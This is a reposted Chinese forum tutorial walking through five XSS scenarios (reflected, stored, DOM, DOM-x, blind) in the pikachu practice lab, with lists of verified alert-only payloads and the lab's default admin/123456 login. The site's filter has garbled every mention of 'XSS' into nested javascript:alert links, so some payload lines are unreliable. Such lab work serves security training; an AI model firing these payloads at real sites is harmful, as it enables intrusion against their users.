ToB企服应用市场:ToB评测及商务社交产业平台

标题: Web漏洞-XSS实验-pikachu靶场5个场景(二) [打印本页]
作者: 莫张周刘王    时间: 2023-12-16 12:14
标题: Web漏洞-XSS实验-pikachu靶场5个场景(二)
★★实战前置声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、前言

上一篇《Web漏洞-XSS理论和靶场小试牛刀(一)》已经介绍了XSS一些理论知识点,本文主要是分享pikachu靶场XSS攻击的3个类型5个场景:反射型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>(post)、存储型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>-x和<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>之盲打。攻击思路是怎么样的,为什么使用这个poc。
2、反射型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>(post)

2.0、该验证需登录

注意:该验证需要先用户登录完才可操作,账户名/密码:admin/123456,可以右击上方提示。
2.1、正常操作

输入'?"&/6666,界面显示如下:

2.2、查看源码

按F2看源码,发现输入的内容直接回显,且放在p标签内,输入框也没有长度限制。

2.3、确定攻击poc

攻击poc选择就比较多,以下是我验证通过的poc
  1. <svg onload=alert(1)>
  2. <img src=1 onerror=alert(1)>
  3. <M onmouseover=alert(1)>M
  4. <a target="_blank" target="_blank" target="_blank" href=javascript:alert(1) ><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
  5. <a target="_blank" href="https://www.cnblogs.com/" onclick="alert(1)"><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
复制代码

3、存储型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>

3.1、正常操作

输入'?"&/6666,界面显示如下:

3.2、查看源码

按F2看源码,发现输入的内容直接回显,且放在p标签内,输入框也没有长度限制。

3.3、确定攻击poc

攻击poc选择就比较多,以下是验证通过的poc
  1. <svg onload=alert(1)>
  2. <img src=1 onerror=alert(1)>
  3. <M onmouseover=alert(1)>M
  4. <a target="_blank" target="_blank" target="_blank" href=javascript:alert(1) ><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
  5. <a target="_blank" href="https://www.cnblogs.com/" onclick="alert(1)"><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
复制代码

4、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>

4.1、正常操作

输入'?"&/6666,发现显示有点奇怪,调整成输入123,界面显示如下:


4.2、查看源码

按F2看源码,发现输入的内容,是填充在a标签的href内,没有编码,href是用双引号的。
确定是否有编码是通过输入'?"&/6666,按F12看源码的。

4.3、确定攻击poc

攻击poc就可以采用a标签弹窗方式的语句了
  1. <a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>
复制代码
注意:只取href里面的部分,且alert()的内容需要用双引号,或者用数字的方式。
验证成功的poc
  1. javascript:alert("test")
  2. javascript:alert(1)
复制代码

5、DOM型<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>-x

5.1、正常操作

输入'?"&/6666,发现显示有点奇怪,调整成输入123,界面显示如下:


5.2、查看源码

按F2看源码,发现输入的内容,是填充在a标签的href内,没有编码,href是用双引号的。
图示包含在5.1里面了,不再单独截图
5.3、确定攻击poc

攻击poc就可以采用a标签弹窗方式的语句了
  1. <a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>
复制代码
注意:只取href里面的部分,且alert()的内容需要用双引号,或者用数字的方式。
验证成功的poc
  1. javascript:alert("test")
  2. javascript:alert(1)
复制代码

6、<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>之盲打

6.1、正常操作

一次输入正常的内容,一次输入'?"&/6666,按F12在当前页都没发现提交后相关信息,提交页面的两个输入框长度没有限制。

点右上方“点一下提示~”,
  1. 访问:http://127.0.0.1/pikachu/vul/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>blind/admin_login.php输入pikachu的默认用户名和密码:admin / 123456跳转到页面:http://127.0.0.1/pikachu/vul/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>/<a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a>blind/admin.php是刚才提交的结果列表页
复制代码
界面显示如下:

6.2、查看源码

按F2看源码,发现输入的内容,是列表展示是在表格td标签内,没有编码。

6.3、确定攻击poc

攻击poc选择就比较多,以下是验证通过的poc
  1. <svg onload=alert(1)>
  2. <img src=1 onerror=alert(1)>
  3. <M onmouseover=alert(1)>M
  4. <a target="_blank" target="_blank" target="_blank" href=javascript:alert(1) ><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
  5. <a target="_blank" href="https://www.cnblogs.com/" onclick="alert(1)"><a target="_blank" target="_blank" href=javascript:alert('<a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a>') > <a target="_blank" target="_blank" href=javascript:alert('xss') > xss</a></a></a>
复制代码


7、资料获取

靶场环境搭建请参考《靶场环境搭建【XP、pikachu、dvwa、sqli-labs】》

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4